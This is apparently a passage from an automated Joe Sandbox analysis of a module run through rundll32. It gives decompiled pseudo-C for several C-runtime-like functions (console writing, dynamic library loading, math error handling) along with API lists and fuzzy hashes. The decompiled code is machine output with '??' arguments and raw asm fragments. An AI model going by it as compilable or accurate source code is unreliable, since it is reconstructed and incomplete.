                				_t128 = __rcx;
                				_a8 = __rbx;
                				_t117 =  *0x53754140; // 0x9bd95a2971b4
                				_v72 = _t117 ^ _t149 - 0x00000080;
                				r12d = r9d;
                				_t162 = __edx >> 6;
                				_t147 = __edx << 6;
                				_v96 = __r8;
                				_t126 = __rcx;
                				_t158 = _t157 + __r8;
                				_v104 = 0x53754e50;
                				_v108 = GetConsoleCP();
                				 *__rcx = _t136;
                				 *((intOrPtr*)(__rcx + 8)) = 0;
                				if (__r8 - _t158 >= 0) goto 0x535f3eca;
                				r13b =  *((intOrPtr*)(__r8));
                				_v120 = 0;
                				_t137 =  *((intOrPtr*)(0x53754e50 + _t162 * 8));
                				_t86 =  *(_t137 + _t147 + 0x3d);
                				if ((_t86 & 0x00000004) == 0) goto 0x535f3d9f;
                				 *(_t137 + _t147 + 0x3d) = _t86 & 0x000000fb;
                				r8d = 2;
                				_v88 =  *((intOrPtr*)(_t137 + _t147 + 0x3e));
                				_v87 = r13b;
                				goto 0x535f3de4;
                				E00007FFA7FFA535ED520(_t86 & 0x000000fb, __fp0,  *((intOrPtr*)( *((intOrPtr*)(0x53754e50 + _t162 * 8)) + _t147 + 0x28)), __rcx, __rcx,  &_v88, __r9);
                				if (( *(0x53754e50 + _t128 * 2) & 0x00008000) == 0) goto 0x535f3ddb;
                				if (__r8 - _t158 >= 0) goto 0x535f3eaa;
                				r8d = 2;
                				if (E00007FFA7FFA535EFBE0( *((intOrPtr*)( *((intOrPtr*)(0x53754e50 + _t162 * 8)) + _t147 + 0x28)),  &_v120, __r8) == 0xffffffff) goto 0x535f3eca;
                				_t144 = __r8 + 1;
                				goto 0x535f3df6;
                				r8d = 1;
                				if (E00007FFA7FFA535EFBE0( *((intOrPtr*)( *((intOrPtr*)(0x53754e50 + _t162 * 8)) + _t147 + 0x28)),  &_v120, _t144) == 0xffffffff) goto 0x535f3eca;
                				_v128 = _v128 & 0x00000000;
                				_v136 = _v136 & 0x00000000;
                				r9d = 1;
                				_v144 = 5;
                				_v152 =  &_v80;
                				_t80 = WideCharToMultiByte(??, ??, ??, ??, ??, ??, ??, ??);
                				r14d = _t80;
                				if (_t80 == 0) goto 0x535f3eca;
                				_v152 = _v152 & 0x00000000;
                				_t141 =  &_v80;
                				r8d = _t80;
                				if (WriteFile(??, ??, ??, ??, ??) == 0) goto 0x535f3ec2;
                				_t126[1] = _t126[2] - _v96 + _t99;
                				if (_v112 - r14d < 0) goto 0x535f3eca;
                				if (r13b != 0xa) goto 0x535f3ea2;
                				_t50 = _t141 + 0xd; // 0xd
                				_v152 = _t141;
                				_t52 = _t141 + 1; // 0x1
                				r8d = _t52;
                				_v116 = _t50;
                				if (WriteFile(??, ??, ??, ??, ??) == 0) goto 0x535f3ec2;
                				if (_v112 - 1 < 0) goto 0x535f3eca;
                				_t126[2] = _t126[2] + 1;
                				_t126[1] = _t126[1] + 1;
                				goto 0x535f3d60;
                				 *((char*)( *((intOrPtr*)(0x53754e50 + _t162 * 8)) + _t147 + 0x3e)) =  *((intOrPtr*)(_t144 + 1));
                				 *( *((intOrPtr*)(0x53754e50 + _t162 * 8)) + _t147 + 0x3d) =  *( *((intOrPtr*)(0x53754e50 + _t162 * 8)) + _t147 + 0x3d) | 0x00000004;
                				_t126[1] = _t126[1] + 1;
                				goto 0x535f3eca;
                				_t85 = GetLastError();
                				 *_t126 = _t85;
                				E00007FFA7FFA535F51E0();
                				return _t85;
                			}

                APIs
                Memory Dump Source
                • Source File: 00000002.00000002.523704677.00007FFA535E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFA535E0000, based on PE: true
                • Associated: 00000002.00000002.523690784.00007FFA535E0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000002.00000002.523724243.00007FFA535FC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000002.00000002.523835126.00007FFA5367C000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000002.00000002.523946473.00007FFA53754000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000002.00000002.523958296.00007FFA53756000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_7ffa535e0000_rundll32.jbxd
                Similarity
                • API ID: FileWrite$ByteCharConsoleErrorLastMultiWide
                • String ID:
                • API String ID: 3659116390-0
                • Opcode ID: 83dccb9937e3ac222778909160735bcc582b8dc578fbd95a744c34ed9864d015
                • Instruction ID: e3d35f6fcd6e256d735954e834aef5e91b0fb3d651fe4a3d538b3c1449825c07
                • Opcode Fuzzy Hash: 83dccb9937e3ac222778909160735bcc582b8dc578fbd95a744c34ed9864d015
                • Instruction Fuzzy Hash: 18518F72B24A5189F710CB65E4443AD3BBAFB86B98F089135DF4E676A8DF38D145C700
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 36%
                			E00007FFA7FFA535ED718(void* __ecx, void* __edx, void* __rax, long long __rbx, void* __rdx, signed int __rsi, void* __r8, void* __r9) {
                				signed long long _t74;
                				signed long long _t78;
                				intOrPtr _t80;
                				signed long long _t82;
                				signed long long _t91;
                				struct HINSTANCE__* _t96;
                				signed long long _t97;
                				long long _t103;
                				void* _t107;
                				signed long long _t111;
                				signed long long _t113;
                				signed long long _t116;
                				struct HINSTANCE__* _t117;
                				long _t120;
                				void* _t123;
                				WCHAR* _t125;
                
                				 *((long long*)(_t107 + 8)) = __rbx;
                				 *((long long*)(_t107 + 0x10)) = _t103;
                				 *((long long*)(_t107 + 0x18)) = __rsi;
                				r14d = __ecx;
                				_t113 =  *0x53754140; // 0x9bd95a2971b4
                				_t97 = _t96 | 0xffffffff;
                				_t91 = _t113 ^  *(0x7ffa535e0000 + 0x1755f0 + _t123 * 8);
                				asm("dec eax");
                				if (_t91 == _t97) goto 0x535ed899;
                				if (_t91 == 0) goto 0x535ed781;
                				_t74 = _t91;
                				goto 0x535ed89b;
                				if (__r8 == __r9) goto 0x535ed82d;
                				_t80 =  *((intOrPtr*)(0x7ffa535e0000 + 0x175550 + __rsi * 8));
                				if (_t80 == 0) goto 0x535ed7a1;
                				if (_t80 == _t97) goto 0x535ed819;
                				goto 0x535ed814;
                				r8d = 0x800;
                				LoadLibraryExW(_t125, _t123, _t120);
                				if (_t74 != 0) goto 0x535ed7e2;
                				if (GetLastError() != 0x57) goto 0x535ed7e0;
                				r8d = 0;
                				LoadLibraryExW(??, ??, ??);
                				_t82 = _t74;
                				goto 0x535ed7e2;
                				if (_t82 != 0) goto 0x535ed7fb;
                				 *((intOrPtr*)(0x7ffa535e0000 + 0x175550 + __rsi * 8)) = _t97;
                				goto 0x535ed819;
                				_t19 = 0x7ffa535e0000 + 0x175550 + __rsi * 8;
                				_t78 =  *_t19;
                				 *_t19 = _t82;
                				if (_t78 == 0) goto 0x535ed814;
                				FreeLibrary(_t117);
                				if (_t82 != 0) goto 0x535ed86e;
                				if (__r8 + 4 != __r9) goto 0x535ed78a;
                				if (_t82 == 0) goto 0x535ed87e;
                				GetProcAddress(_t96);
                				if (_t78 == 0) goto 0x535ed877;
                				_t111 =  *0x53754140; // 0x9bd95a2971b4
                				asm("dec eax");
                				 *(0x7ffa535e0000 + 0x1755f0 + _t123 * 8) = _t78 ^ _t111;
                				goto 0x535ed89b;
                				goto 0x535ed82f;
                				_t116 =  *0x53754140; // 0x9bd95a2971b4
                				asm("dec eax");
                				 *(0x7ffa535e0000 + 0x1755f0 + _t123 * 8) = _t97 ^ _t116;
                				return 0;
                			}

                APIs
                • GetProcAddress.KERNEL32(?,00009BD95A2971B4,00000006,00007FFA535EDAE3,?,?,00000000,00007FFA535E8B23,?,?,00009BD95A2971B4,00007FFA535E8389), ref: 00007FFA535ED83A
                Memory Dump Source
                • Source File: 00000002.00000002.523704677.00007FFA535E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFA535E0000, based on PE: true
                • Associated: 00000002.00000002.523690784.00007FFA535E0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000002.00000002.523724243.00007FFA535FC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000002.00000002.523835126.00007FFA5367C000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000002.00000002.523946473.00007FFA53754000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000002.00000002.523958296.00007FFA53756000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_7ffa535e0000_rundll32.jbxd
                Similarity
                • API ID: AddressProc
                • String ID:
                • API String ID: 190572456-0
                • Opcode ID: 5dc0bb12abbf4a7a14033368e2d0c6602d9198ce90f65ce4c3b152005258811c
                • Instruction ID: e52e3fb4c5b8affbfb8a43defc3987157ecd289b4e0e31051c91c42c01c15d51
                • Opcode Fuzzy Hash: 5dc0bb12abbf4a7a14033368e2d0c6602d9198ce90f65ce4c3b152005258811c
                • Instruction Fuzzy Hash: D9411361F2AF428DFA159B12A80463523DBBF96B90F0DE534DD1D6B394EE3CE4049340
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 84%
                			E00007FFA7FFA535F0A88(void* __ebx, signed int __ecx, void* __edx, void* __rax, long long __rbx, void* __rcx, void* __rdx, void* __rdi, long long __rsi, long long _a8, long long _a16) {
                				signed int _t44;
                				signed int _t45;
                				signed int _t46;
                				signed int _t48;
                
                				_t54 = __rcx;
                				_t51 = __rax;
                				_a8 = __rbx;
                				_a16 = __rsi;
                				if ((__ecx & 0x00000008) == 0) goto 0x535f0ab9;
                				if (__edx >= 0) goto 0x535f0ab9;
                				E00007FFA7FFA535EC21C(__rax, __rcx);
                				goto 0x535f0b10;
                				_t44 = 0x00000004 & dil;
                				if (_t44 == 0) goto 0x535f0ad4;
                				asm("dec eax");
                				if (_t44 >= 0) goto 0x535f0ad4;
                				E00007FFA7FFA535EC21C(__rax, _t54);
                				goto 0x535f0b10;
                				_t45 = dil & 0x00000001;
                				if (_t45 == 0) goto 0x535f0af0;
                				asm("dec eax");
                				if (_t45 >= 0) goto 0x535f0af0;
                				E00007FFA7FFA535EC21C(__rax, _t54);
                				goto 0x535f0b10;
                				_t46 = dil & 0x00000002;
                				if (_t46 == 0) goto 0x535f0b10;
                				asm("dec eax");
                				if (_t46 >= 0) goto 0x535f0b10;
                				if ((dil & 0x00000010) == 0) goto 0x535f0b0d;
                				E00007FFA7FFA535EC21C(_t51, _t54);
                				_t48 = dil & 0x00000010;
                				if (_t48 == 0) goto 0x535f0b2a;
                				asm("dec eax");
                				if (_t48 >= 0) goto 0x535f0b2a;
                				E00007FFA7FFA535EC21C(_t51, _t54);
                				return;
                			}

                APIs
                Memory Dump Source
                • Source File: 00000002.00000002.523704677.00007FFA535E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFA535E0000, based on PE: true
                • Associated: 00000002.00000002.523690784.00007FFA535E0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000002.00000002.523724243.00007FFA535FC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000002.00000002.523835126.00007FFA5367C000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000002.00000002.523946473.00007FFA53754000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000002.00000002.523958296.00007FFA53756000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_7ffa535e0000_rundll32.jbxd
                Similarity
                • API ID: _set_statfp
                • String ID:
                • API String ID: 1156100317-0
                • Opcode ID: 9e637d860787cd7530e08ec34b9611fe00c3f0bd966f6bff25759c960a0e2ccc
                • Instruction ID: 83885d8ba2104064e4ed76b75ce5aeb04fb968a19f196ac4118698f778bbb879
                • Opcode Fuzzy Hash: 9e637d860787cd7530e08ec34b9611fe00c3f0bd966f6bff25759c960a0e2ccc
                • Instruction Fuzzy Hash: 951160B6E78F031DF6581368E85137D114B6FD63A8E4CE634EAAE275D68E6CA4448200
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 16%
                			E00007FFA7FFA535F4118(void* __eax, void* __ecx, signed int __edx, void* __esi, void* __ebp, signed long long __rbx, signed int* __rcx, long long __rbp, signed short* __r8, signed long long _a8, signed long long _a16, long long _a24, char _a40, char _a1744, char _a1752, signed long long _a5176, void* _a5192) {
                				intOrPtr _v0;
                				signed long long _v8;
                				int _t34;
                				long _t38;
                				signed int _t40;
                				void* _t46;
                				int _t51;
                				void* _t62;
                				signed long long _t63;
                				short* _t68;
                				signed int* _t69;
                				void* _t85;
                				void* _t92;
                				void* _t98;
                				void* _t101;
                				void* _t104;
                				void* _t105;
                
                				_a8 = __rbx;
                				_a24 = __rbp;
                				E00007FFA7FFA535F54B0(__ecx, _t62, __rcx, _t85, __r8, _t98, _t101);
                				_t63 =  *0x53754140; // 0x9bd95a2971b4
                				_a5176 = _t63 ^ _t92 - _t62;
                				r14d = r9d;
                				r10d = r10d & 0x0000003f;
                				_t105 = _t104 + __r8;
                				 *__rcx =  *__rcx & 0x00000000;
                				__rcx[1] =  *((intOrPtr*)(0x53754e50 + (__edx >> 6) * 8));
                				if (__r8 - _t105 >= 0) goto 0x535f425b;
                				_t68 =  &_a40;
                				if (__r8 - _t105 >= 0) goto 0x535f41c3;
                				_t40 =  *__r8 & 0x0000ffff;
                				if (_t40 != 0xa) goto 0x535f41af;
                				 *_t68 = 0xd;
                				_t69 = _t68 + 2;
                				 *_t69 = _t40;
                				if ( &(_t69[0]) -  &_a1744 < 0) goto 0x535f4191;
                				_a16 = _a16 & 0x00000000;
                				_a8 = _a8 & 0x00000000;
                				_v0 = 0xd55;
                				_v8 =  &_a1752;
                				r9d = 0;
                				_t34 = WideCharToMultiByte(??, ??, ??, ??, ??, ??, ??, ??);
                				_t51 = _t34;
                				if (_t34 == 0) goto 0x535f4253;
                				if (_t34 == 0) goto 0x535f4243;
                				_v8 = _v8 & 0x00000000;
                				r8d = _t51;
                				r8d = r8d;
                				if (WriteFile(??, ??, ??, ??, ??) == 0) goto 0x535f4253;
                				if (0 + _a24 - _t51 < 0) goto 0x535f4210;
                				__rcx[1] = _t46 - r15d;
                				goto 0x535f4186;
                				_t38 = GetLastError();
                				 *__rcx = _t38;
                				E00007FFA7FFA535F51E0();
                				return _t38;
                			}

                APIs
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.523704677.00007FFA535E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFA535E0000, based on PE: true
                • Associated: 00000002.00000002.523690784.00007FFA535E0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000002.00000002.523724243.00007FFA535FC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000002.00000002.523835126.00007FFA5367C000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000002.00000002.523946473.00007FFA53754000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000002.00000002.523958296.00007FFA53756000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_7ffa535e0000_rundll32.jbxd
                Similarity
                • API ID: ByteCharErrorFileLastMultiWideWrite
                • String ID: U
                • API String ID: 2456169464-4171548499
                • Opcode ID: 4075517f7857747b7ea44fef219e885793f2915a22ae05a0ce25cc65d5e7b8de
                • Instruction ID: b0f83e618ff7f4f053d1a05c155f389c7799a95f2fe479626a6fe59c853baba3
                • Opcode Fuzzy Hash: 4075517f7857747b7ea44fef219e885793f2915a22ae05a0ce25cc65d5e7b8de
                • Instruction Fuzzy Hash: A241F2A2B28B8186E7209F25E8447AE67A6FBD9780F489031EE4D97788DF3CD010C700
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 71%
                			E00007FFA7FFA535E8A30(void* __ecx, void* __fp0, void* __rax, long long __rbx, void* __r9, long long _a8) {
                				long _t3;
                				void* _t4;
                				void* _t6;
                				void* _t9;
                				intOrPtr _t12;
                				intOrPtr _t15;
                				void* _t25;
                				void* _t29;
                				void* _t31;
                				void* _t34;
                				void* _t35;
                				void* _t39;
                
                				_t27 = __rbx;
                				_t25 = __rax;
                				_a8 = __rbx;
                				_t3 = GetLastError();
                				_t12 =  *0x53754160; // 0x6
                				if (_t12 == 0xffffffff) goto 0x535e8a5a;
                				_t4 = E00007FFA7FFA535EDA58(_t3, _t12 - 0xffffffff, __rax, __rbx, _t29, _t35);
                				if (__rax != 0) goto 0x535e8a9b;
                				E00007FFA7FFA535E7FB0(_t4, _t29, _t31);
                				_t34 = _t25;
                				if (_t25 != 0) goto 0x535e8a7a;
                				_t6 = E00007FFA7FFA535E7E58(_t25, _t29);
                				goto 0x535e8ab6;
                				_t15 =  *0x53754160; // 0x6
                				if (E00007FFA7FFA535EDAB0(_t6, _t25, _t25, _t27, _t29, _t25, _t35) == 0) goto 0x535e8a73;
                				E00007FFA7FFA535E879C(_t15, __fp0, _t34, _t39);
                				_t9 = E00007FFA7FFA535E7E58(_t25, _t34);
                				if (_t34 == 0) goto 0x535e8ab6;
                				SetLastError(??);
                				return _t9;
                			}

                APIs
                • GetLastError.KERNEL32(?,?,?,00007FFA535EE8F5,?,?,?,?,?,?,?,00007FFA535EEAAD), ref: 00007FFA535E8A3A
                • SetLastError.KERNEL32(?,?,?,00007FFA535EE8F5,?,?,?,?,?,?,?,00007FFA535EEAAD), ref: 00007FFA535E8AA2
                • SetLastError.KERNEL32(?,?,?,00007FFA535EE8F5,?,?,?,?,?,?,?,00007FFA535EEAAD), ref: 00007FFA535E8AB8
                • abort.LIBCMT ref: 00007FFA535E8ABE
                Memory Dump Source
                • Source File: 00000002.00000002.523704677.00007FFA535E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFA535E0000, based on PE: true
                • Associated: 00000002.00000002.523690784.00007FFA535E0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000002.00000002.523724243.00007FFA535FC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000002.00000002.523835126.00007FFA5367C000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000002.00000002.523946473.00007FFA53754000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000002.00000002.523958296.00007FFA53756000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_7ffa535e0000_rundll32.jbxd
                Similarity
                • API ID: ErrorLast$abort
                • String ID:
                • API String ID: 1447195878-0
                • Opcode ID: eec2c14e0966c9bea527e14d519690d7303d22ce24e7ab342e75b1017aa929f8
                • Instruction ID: 41d6bc8505a41966eb2bf847cbed8b94652b182d55b5b757ed1cf7b8d335e363
                • Opcode Fuzzy Hash: eec2c14e0966c9bea527e14d519690d7303d22ce24e7ab342e75b1017aa929f8
                • Instruction Fuzzy Hash: EE018C21F39F464EFA59A731A55513D119B5FC6BA0F0CE478ED2E227D2ED2CF8456200
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 34%
                			E00007FFA7FFA535EA718(void* __eax, signed int __ecx, void* __rbx, intOrPtr _a8, intOrPtr _a16, signed long long _a24, intOrPtr _a32, intOrPtr _a40, intOrPtr _a64) {
                				signed int _t39;
                				signed int _t43;
                				signed int _t44;
                				void* _t47;
                				void* _t49;
                				void* _t54;
                				void* _t56;
                				signed long long _t81;
                				signed long long _t82;
                				signed long long _t84;
                				signed long long _t86;
                				unsigned long long _t87;
                
                				asm("movss [esp+0x8], xmm0");
                				asm("movaps xmm4, xmm1");
                				asm("movaps xmm1, xmm0");
                				asm("xorps xmm2, xmm2");
                				asm("cvtss2sd xmm2, xmm1");
                				asm("xorps xmm3, xmm3");
                				asm("movsd [esp+0x70], xmm2");
                				_t81 = _a24;
                				asm("cvtss2sd xmm3, xmm4");
                				_t84 = _t81 & 0xffffffff;
                				asm("movsd [esp+0x70], xmm3");
                				_t87 = _a24;
                				_t86 = _t87 & 0xffffffff;
                				_t39 = __ecx & 0x000007ff;
                				_t44 = _t43 & 0x000007ff;
                				if (_t39 - 1 < 0) goto 0x535ea8c4;
                				if (_t39 - 0x7fe > 0) goto 0x535ea8cc;
                				if ((_t87 >> 0x34) - 1 - 0x7fd > 0) goto 0x535ea8c4;
                				if (_t84 != _t86) goto 0x535ea7c2;
                				_t82 = _t81 & 0x00000000;
                				_a24 = _t82;
                				asm("movsd xmm0, [esp+0x70]");
                				asm("cvtpd2ps xmm0, xmm0");
                				goto 0x535ea957;
                				_a24 = _t84;
                				asm("movsd xmm2, [esp+0x70]");
                				_a24 = _t86;
                				asm("movsd xmm3, [esp+0x70]");
                				_t54 = _t84 - _t86;
                				if (_t54 >= 0) goto 0x535ea7f8;
                				asm("xorps xmm0, xmm0");
                				asm("comiss xmm0, xmm1");
                				if (_t54 <= 0) goto 0x535ea7ec;
                				asm("xorps xmm2, [0x86974]");
                				asm("xorps xmm0, xmm0");
                				asm("cvtsd2ss xmm0, xmm2");
                				goto 0x535ea957;
                				asm("stmxcsr dword [esp+0x68]");
                				r8d = _a16;
                				if (_t39 - _t44 <= 0) goto 0x535ea87c;
                				_t47 = (0x2aaaaaab * (_t39 - _t44) >> 0x20 >> 2) + (0x2aaaaaab * (_t39 - _t44) >> 0x20 >> 2 >> 0x1f);
                				_a24 = 0x3ff << 0x34;
                				asm("movsd xmm0, [esp+0x70]");
                				asm("mulsd xmm0, xmm3");
                				_a24 = 0;
                				asm("movsd xmm4, [esp+0x70]");
                				asm("movaps xmm3, xmm0");
                				_t56 = _t47;
                				if (_t56 <= 0) goto 0x535ea87c;
                				asm("movaps xmm0, xmm2");
                				asm("divsd xmm0, xmm3");
                				asm("cvttsd2si eax, xmm0");
                				asm("movd xmm1, eax");
                				asm("cvtdq2pd xmm1, xmm1");
                				asm("mulsd xmm1, xmm3");
                				asm("mulsd xmm3, xmm4");
                				asm("subsd xmm2, xmm1");
                				if (_t56 != 0) goto 0x535ea857;
                				asm("movaps xmm0, xmm2");
                				_a16 = r8d;
                				asm("divsd xmm0, xmm3");
                				asm("cvttsd2si eax, xmm0");
                				asm("movd xmm1, eax");
                				asm("cvtdq2pd xmm1, xmm1");
                				asm("mulsd xmm1, xmm3");
                				asm("subsd xmm2, xmm1");
                				asm("movsd [esp+0x70], xmm2");
                				asm("ldmxcsr dword [esp+0x68]");
                				asm("xorps xmm0, xmm0");
                				asm("comiss xmm0, [esp+0x60]");
                				asm("movaps xmm0, xmm2");
                				if (_t56 <= 0) goto 0x535ea8bb;
                				asm("xorps xmm0, [0x868a5]");
                				asm("cvtsd2ss xmm0, xmm0");
                				goto 0x535ea957;
                				if (_t47 - 0x7fe <= 0) goto 0x535ea8e3;
                				if ((0xffffffff & _t82) == 0) goto 0x535ea917;
                				asm("movss [esp+0x60], xmm1");
                				goto 0x535ea900;
                				if (_t47 - 0x7fe <= 0) goto 0x535ea90d;
                				if ((0xffffffff & _t87) == 0) goto 0x535ea957;
                				asm("movss [esp+0x60], xmm4");
                				goto 0x535f0dbc;
                				if (_a8 - 1 >= 0) goto 0x535ea917;
                				if (_t47 - 1 >= 0) goto 0x535ea957;
                				_a64 = 2;
                				asm("movss [esp+0x38], xmm4");
                				r9d = 1;
                				asm("movss [esp+0x30], xmm1");
                				r8d = 0xffc00000;
                				_a40 = 0x21;
                				_a32 = 8;
                				return E00007FFA7FFA535F0C6C(0x3ff, _a8, _t49, _t47 - 1, 0x53671ccc, _t87 >> 0x34, _t82);
                			}

                APIs
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.523704677.00007FFA535E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFA535E0000, based on PE: true
                • Associated: 00000002.00000002.523690784.00007FFA535E0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000002.00000002.523724243.00007FFA535FC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000002.00000002.523835126.00007FFA5367C000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000002.00000002.523946473.00007FFA53754000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000002.00000002.523958296.00007FFA53756000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_7ffa535e0000_rundll32.jbxd
                Similarity
                • API ID: _handle_errorf
                • String ID: !$fmodf
                • API String ID: 2315412904-1366221206
                • Opcode ID: 809ba85aedd89a7189055f61ead85860735a5eea0ac88f8d965bf70d4784b19b
                • Instruction ID: bffad52782ab9adb1ac216f743baebd478a33d63fd8551fb4a0f8024e73271d4
                • Opcode Fuzzy Hash: 809ba85aedd89a7189055f61ead85860735a5eea0ac88f8d965bf70d4784b19b
                • Instruction Fuzzy Hash: A851EC32D2CF854BD612C7355441239A2A6EFD7390F14D336FA5E76AE5DB2CE4829E00
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.523704677.00007FFA535E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFA535E0000, based on PE: true
                • Associated: 00000002.00000002.523690784.00007FFA535E0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000002.00000002.523724243.00007FFA535FC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000002.00000002.523835126.00007FFA5367C000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000002.00000002.523946473.00007FFA53754000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000002.00000002.523958296.00007FFA53756000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_7ffa535e0000_rundll32.jbxd
                Similarity
                • API ID: FileHandleType
                • String ID: @
                • API String ID: 3000768030-2766056989
                • Opcode ID: 4f5111625b1407a19fdabbefee9c8c7e3abfb380d48dda17de014767798d5151
                • Instruction ID: 618d5276e47d146b9cf9da45befc5598c52de1a1d90d6f3e986a99bd73336b0b
                • Opcode Fuzzy Hash: 4f5111625b1407a19fdabbefee9c8c7e3abfb380d48dda17de014767798d5151
                • Instruction Fuzzy Hash: CB218862A28F5249E7658B24D490139265AEFC6F74F2C6376D67F277D4CE38D481E300
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 50%
                			E00007FFA7FFA535ED26C(signed int __ecx, void* __r9, signed long long _a16, intOrPtr _a32, intOrPtr _a40, intOrPtr _a64) {
                				void* _t17;
                				signed int _t18;
                				signed char _t19;
                				void* _t23;
                				signed int _t27;
                				signed long long _t37;
                
                				asm("movsd [esp+0x8], xmm0");
                				asm("movsd [esp+0x68], xmm0");
                				_t37 = _a16;
                				if ((_t37 & 0x00000000) != 0) goto 0x535ed30c;
                				if ((0xffffffff & _t37) == 0) goto 0x535ed2b1;
                				goto 0x535f0da0;
                				if ((0x00000000 & _t37) == 0) goto 0x535ed30c;
                				asm("movsd xmm1, [esp+0x60]");
                				r9d = 1;
                				asm("xorps xmm0, xmm0");
                				_a64 = r9d;
                				asm("movsd [esp+0x38], xmm0");
                				asm("movsd [esp+0x30], xmm1");
                				_a40 = 0x21;
                				_a32 = 8;
                				_t18 = E00007FFA7FFA535F0B44(_t17, __ecx, _t23, 0x00000000 & _t37, 0x53671efc, _t37, 0);
                				goto 0x535ed33a;
                				_t27 = 0xffffffff & _t37;
                				asm("dec eax");
                				_t19 = _t18 & 0xffffff00 | _t27 > 0x00000000;
                				if ((_t19 & (__ecx & 0xffffff00 | _t27 != 0x00000000)) != 0) goto 0x535ed2c0;
                				asm("sqrtsd xmm2, [esp+0x60]");
                				asm("movsd [esp+0x70], xmm2");
                				asm("movsd xmm0, [esp+0x70]");
                				return _t19;
                			}










                APIs
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.523704677.00007FFA535E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFA535E0000, based on PE: true
                • Associated: 00000002.00000002.523690784.00007FFA535E0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000002.00000002.523724243.00007FFA535FC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000002.00000002.523835126.00007FFA5367C000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000002.00000002.523946473.00007FFA53754000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000002.00000002.523958296.00007FFA53756000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_7ffa535e0000_rundll32.jbxd
                Similarity
                • API ID: _handle_error
                • String ID: !$sqrt
                • API String ID: 1757819995-799759792
                • Opcode ID: 729eb5268c35a0980c09cb185ac8c72b798560779506d5a1e1b96fb7e0acc6fb
                • Instruction ID: 4a54b17e134f0adf238fc96ea45de3cbe74dd13ad5ec81118c7a93bf6dbe069b
                • Opcode Fuzzy Hash: 729eb5268c35a0980c09cb185ac8c72b798560779506d5a1e1b96fb7e0acc6fb
                • Instruction Fuzzy Hash: E111B472928F8586DE41CF11A50032A66A6EFDB7E4F24D335EA6C16BC8DF2CE0419B00
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 37%
                			E00007FFA7FFA535F20EB(void* __eax, void* __ecx, void* __rax) {
                
                				asm("rcr dword [ebp+0x816ee0d], 1");
                				 *((intOrPtr*)(__rax - 0x7d)) =  *((intOrPtr*)(__rax - 0x7d)) + __ecx;
                				asm("loopne 0x5");
                				return __eax;
                			}




                APIs
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.523704677.00007FFA535E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFA535E0000, based on PE: true
                • Associated: 00000002.00000002.523690784.00007FFA535E0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000002.00000002.523724243.00007FFA535FC000.00000002.00000001.01000000.00000003.sdmp
